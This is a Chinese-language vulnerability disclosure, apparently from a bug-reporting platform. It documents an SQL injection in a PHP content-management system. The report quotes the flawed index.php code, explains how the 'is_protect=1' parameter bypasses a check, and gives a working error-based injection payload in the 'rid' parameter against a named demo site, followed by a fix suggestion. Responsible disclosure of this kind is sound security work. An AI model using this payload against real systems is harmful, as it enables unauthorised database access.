2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经确认,细节仅向厂商公开 2015-04-04: 细节向第三方安全合作伙伴开放 2015-05-26: 细节向核心白帽子及相关领域专家公开 2015-06-05: 细节向普通白帽子公开 2015-06-15: 细节向实习白帽子公开 2015-06-30: 细节向公众公开
demo站点测试成功 看到别人之前的提交转给cncert处理了 所以产商我就选择cncert
访问
http://test.nitc.cc/office/privilege.php?action=login
可以看到下面的版本信息 v4.0漏洞页面index.php
<?php/*********************//* *//* Version : 5.1.0 *//* Author : RM *//* Comment : 071223 *//* *//*********************/function exe_php_page( $php_file, $assign ){ $template = ROOT_PATH."themes/".$GLOBALS['_CFG']['template']."/".$php_file; if ( file_exists( $template ) ) { extract( load_xml_config( $GLOBALS['_CFG']['template'] ) ); extract( $assign ); extract( initpublic( $language_cur, $template ) ); require( $template ); }}define( "IN_LOCK", TRUE );define( "ROOTPATH", str_replace( "\\", "/", dirname( __FILE__ )."/" ) );if ( !file_exists( ROOTPATH."includes/install.lock" ) ){ header( "location:install/" ); exit( );}$is_dynamic = 1;require( "includes/init.php" );$is_protect = isset( $_REQUEST['is_protect'] ) ? $_REQUEST['is_protect'] : 0; //这参数很关键 为1 绕过下面if ( $GLOBALS['_CFG']['pseudo_static'] != 1 && $is_protect == 0 ){ header( "location:index.html" ); exit( );}....else if ( $_GET['action'] == "content" ){ $rid = $_GET['rid']; //没处理 if ( $url_separate == "_" ) { $channel_flag = str_replace( "_", "-", $channel_flag ); } $content = $db->getAll( "select channel_content_id,channel_category_id,date_added,is_color,color,is_underline,is_bold,is_italic,filename,small_image,original_image,sort_order from ".$site->table( "channel_content" ).( " where channel_content_id=".$rid ) ); //没用单引号包起来存在注入 $sort_order = $content[0]['sort_order']; $date_added = $content[0]['date_added']; $news_id11 = $content[0]['channel_category_id']; $pre_content = $db->getRow( "select content.channel_content_id,content_desc.name from ".$site->table( "channel_content" )." as content left join ".$site->table( "channel_content_desc" )." as content_desc on content.channel_content_id=content_desc.channel_content_id where content.channel_category_id=".$news_id11." and content_desc.language_id=".$language['language_id'].( " and (content.sort_order > ".$sort_order." or (content.date_added > '{$date_added}' and content.sort_order = '{$sort_order}')) order by content.sort_order asc, content.date_added asc LIMIT 0,1" ) ); if ( $pre_content ) { $pre_content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $pre_content['name'], $pre_content['channel_content_id'], $channel_flag ); $pre_link = "<a href='".$pre_content_url."'>".$_LANG['content_previous']."</a>"; } $next_content = $db->getRow( "select content.channel_content_id,content_desc.name from ".$site->table( "channel_content" )." as content left join ".$site->table( "channel_content_desc" )." as content_desc on content.channel_content_id=content_desc.channel_content_id where content.channel_category_id=".$news_id11." and content_desc.language_id=".$language['language_id'].( " and (content.sort_order < ".$sort_order." or (content.date_added < '{$date_added}' and content.sort_order = '{$sort_order}')) order by content.sort_order desc, content.date_added desc LIMIT 0,1" ) ); if ( $next_content ) { $next_content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $next_content['name'], $next_content['channel_content_id'], $channel_flag ); $next_link = "<a href='".$next_content_url."'>".$_LANG['content_next']."</a>"; } $related_content = $db->getAll( "select channel_content_id,channel_category_id,date_added,is_color,color,is_underline,is_bold,is_italic,filename,small_image,original_image from ".$site->table( "channel_content" )." where channel_category_id=".$news_id11." order by sort_order desc, date_added desc" ); $cnt = 0; $id_arr = array( ); $max_id = 0; $relate_arr = array( ); foreach ( $related_content as $key => $value ) { if ( $value['channel_category_id'] == $news_id11 ) { $content_desc = $db->getRow( "select * from ".$site->table( "channel_content_desc" )." where channel_content_id=".$value['channel_content_id']." and language_id=".$language['language_id'] ); if ( $content_desc ) { $content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $content_desc['name'], $value['channel_content_id'], $channel_flag ); $relate_arr[] = array( "content_url" => $content_url, "name" => $content_desc['name'], "channel_content_id" => $value['channel_content_id'] ); ++$cnt; if ( 7 <= $cnt ) { break; break; } } } else { $id_arr[] = $value['channel_content_id']; if ( $max_id == 0 ) { $max_id = $value['channel_content_id'] + 1; } } }....
漏洞证明访问
http://test.nitc.cc/index.php?action=content&rid= 1 -(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#
post提交
is_protect=1
注入报错 版本信息出来了 不进一步深究
对rid进行处理
危害等级:中
漏洞Rank:9
确认时间:2015-04-01 13:38
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
暂无
